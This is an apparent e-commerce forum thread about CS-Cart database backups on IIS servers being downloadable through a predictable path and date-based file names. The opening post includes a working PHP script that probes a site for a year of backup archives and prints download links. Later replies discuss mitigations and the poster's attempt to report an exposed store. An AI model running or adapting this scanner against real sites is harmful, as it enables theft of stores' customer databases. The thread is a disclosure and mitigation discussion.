Database backup for IIS = data gone

General General Questions
1

This is a bad news for IIS server people. I am sure it is known but I want to tell about anyway.



Directory: /var/database/backup/

File scheme: ‘dump_’.date(‘mdY’).‘.sql.tgz’



While IIS does not allow to list the directory, the DB files are EXPOSED through blind sampling.



I was able through headers to identify what stores run IIS and then scan backup folder for files with todays date and down one year.



I was able to immediately find a website with downloadable database.


<br />
$site='blah.com';<br />
$now=time();<br />
for($i=0;$i<(356);$i++){<br />
	$offset=strtotime("-$i days",$now);<br />
	$date=date('mdY',$offset);<br />
	$show=date('F j, Y',$offset);<br />
	$fname="dump_$date.sql.tgz";<br />
	echo "Testing $show:";<br />
	$url="http://$site/var/database/backup/$fname";<br />
	echo "[$url]";<br />
	if(@fopen($url, "r")){<br />
		echo " EXISTS <a href='$url'>DOWNLOAD</a><br>";<br />
	}else{<br />
		echo ' no<br>';<br />
	}<br />
}<br />

```<br />
<br />
[B][COLOR="Red"]It would help if DB backups would have a trailing string added to their names of [A-Za-z0-9] kind - say 8 chars...[/COLOR][/B]<br />
<br />
<br />
<br />
<br />
.
2

Can Cs-Rep contact me so I could give them the store with exposed DB so you can officially contact them and let them know?



I don’t know if this is an option…

3

helpdesk.cs-cart.com

4

And yet another reason why it is not wise to save DB Backup copies of your stores online!



What I do is backup our DB, then immediately go into /var/database/backup/ and save the backups onto a local pc. Then promptly delete the backup from our site.

5

True but by design it works if used in Apache environment. Sure, there could be password added to the zip and a random string padded with.

6

Well, I posted in the help desk. They don’t read what I posted.



First they said that I don’t have a cs-cart license, they cannot offer help until I will get one. Second time they said it is not the website I have on the account and they cannot help me until I will transfer that license to my account…



I give up.



If you don’t want to inform YOUR customer then there is nothing that I am willing to do.

7

[quote name=‘TexasGuy’]Well, I posted in the help desk. They don’t read what I posted.



First they said that I don’t have a cs-cart license, they cannot offer help until I will get one. Second time they said it is not the website I have on the account and they cannot help me until I will transfer that license to my account…



I give up.



If you don’t want to inform YOUR customer then there is nothing that I am willing to do.[/quote]

Did you read this? [url]https://www.cs-cart.com/support-item.html[/url]

Do you have a license yet?

8

Yes, I bought my license from Blue Labs, it is much cheaper. However, they take their sweet time processing it.



BTW, the CS-Cart support has informed me that they will take steps to inform the website operator, finally someone read the support ticket before dismissing it for “technical reasons.”